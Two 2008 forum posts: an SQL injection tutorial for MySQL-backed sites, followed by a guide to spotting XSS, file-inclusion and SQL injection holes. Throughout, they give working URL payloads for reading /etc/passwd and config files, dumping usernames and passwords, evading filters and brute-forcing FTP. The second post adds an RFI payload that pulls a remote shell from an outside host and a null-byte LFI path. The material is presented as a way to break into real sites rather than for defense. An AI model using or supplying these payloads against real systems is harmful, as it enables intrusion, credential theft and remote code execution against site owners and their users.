r3dr0ot — Mon, 18 Feb 2008 11:13:02 GMT

...::SQL Injection Attacks::...

::What is SQL Injection?::

-SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as: "The act of entering malformed or
unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL
database running behind the website or application executes SQL commands that the programmer never intended to permit,
possibly allowing an intruder to break into or damage the database."

::Background Information::

-It is considered the most common web vulnerability today
-It's a flaw in the web application--not the db, or the server
-Can be injected into: Cookies, Forms, and URL parameters

::Lesson Facts::

-This lesson uses MySQL syntax for all examples.
-This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
-This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
-This lesson gives small examples of filter evasion techniques

::The Lesson::

-Some commands you will need to know:
'union all select': combines two or more select statements into one query and returns all rows
'order by': used to sort rows after a select statement is executed
'load_file()': loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()': used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in
conjunction with load_file
'concat()': combines more than one column into a single column, enabling more columns to be selected than the
number that are showing on the page (You will understand better later)
'--': a comment
'/*': another type of comment

-Injection SQL Queries into URL Parameters
So you've found a site: 'http://www.site.com/index.php?id=5', and want to test if it's vulnerable to
SQL Injections.

1) Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site.
Otherwise, if a blank page showed up you just might be in luck!

2) Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the
number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16 <--returns an error, then we know
that there are 15 columns in our select statement.

3) The next statement will null the id=5 so the script only executes our commands and not it's own, and show us
which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- <--The comment comments out anything the
script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we
can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.

4) Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those
selected values in one column? This is where concat() comes in:
/index.php?id=null union all select
1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--

Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this
demonstrates the use of concat() and char().

The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in
this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of
the database() in use--but only if you're a skiddy!

5) Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where
the files are located that we're trying to open. Below are some methods to get an FPD:
-/index.php?id[]=
-You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping
that you'll find something in Google
-"Session Cookie Trick" <--Thanks to haZed at enigmagroup.org. In the url type:
'javascript:void(document.cookie="PHPSESSID=");' This will give a session_start() error and an FPD.

Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file
you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you
have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109,
101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114,
102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as
config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and
password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then
logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.

-Using information_schema.tables:
So you don't have load_file() perms? No problem, we can check for information_schema.tables.

1) 'table_name' is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can
I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out
other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the
site, so you can pull up the table username and maybe password if they exist...Then what do you think the
information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the
above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables-- <--Selects all 'distinct' table names from information_schema.tables, meaning
it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from
information_schema.columns-- <--Selects all tables and columns that go with each table seperated by a colon

2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration
to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where
table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say:
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
Until no more tables show, then you can do the same for the columns.

3) Now after you've executed one or all of those statements, let's say you found the table 'users'
and it has the columns 'username', 'password', 'id', and 'email'. To extract
that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58),
email),6,7,8,9,10,11,12,13,14,15 from users--
And you'll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15
from users where username='Admin' <--Replacing Admin with the top user's name such as admin or owner
etc..

::Final Tips::
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of
them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users-- <--If the page shows up, you
know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users-- <--If you get a username,
good job you guessed a correct table and column, otherwise keep guessing.

::Filter Evasion Techniques::
-You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
-Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
-Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+'
'+'Se'+'lect'
-Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
-Be creative

::Conclusion::
Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.
I'd like to thank Rebirth, killerguppy101, & Cr1t1cal for helping me get interested in and learn more about SQL
Injections.

::Sources::
http://www.enigmagroup.org/forums/index.php/topic,2372.0.html
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

Thanks for reading,
end3r

Spotting Vulnerable Websites

r3dr0ot — Mon, 18 Feb 2008 11:11:43 GMT

|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search you input, is outputted on the page. the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is outputted on the page, it is most likely
| the site is vulnerable, Checking for hidden tags also is helpfull,
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, any input form you can find in a site, could be
| vulnerable, checking it, by checking if the input is outputted.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
|



?page=http:/www.darkmindz.com/shell/x2300.txt?



?page=../../../../etc/passwd

|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense, if you see the main page redirecting to other pages, by a GET var, it is most likely
vulnerable.
| sometimes, it might be hiding behind an integer, you can spot it by, changing that get var to anything else, and if
you see any main(); errors,
| it is vulerable.
| a common way to bypass some extension restrctions, is to nullbyte the extension, by:



?page=../../../../etc/passwd%00

|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Techical definition : Injecting a SQL, to echo out data from other tables / rows. etc.
|
| - Example:
|
|



?id=-- UNION SELECT ALL FROM USERS /*

|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the times, it is an integer that we are looking for in a GET var, for example : ' ?id=123 ' ' ?cat=22 ' ..
etc.
| if we change that integer to a quote or anything else, we could get a MySQL error, then we know that this site
might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass thru a SQL query to check
for data.
|
| [ Search Engine ]
|
| Same applies here, most search engines looks for the info in a SQL DB. we can always inject that.
|
| [ Different Forms ]
|
| The general rule applies, you can try a random SQL injection, with different quote style to see if it would show any
errors or not.
|
|______________________________________________________________________

Well that was it, I hope you learned something from this tutorial, and questions / comments are welcomed.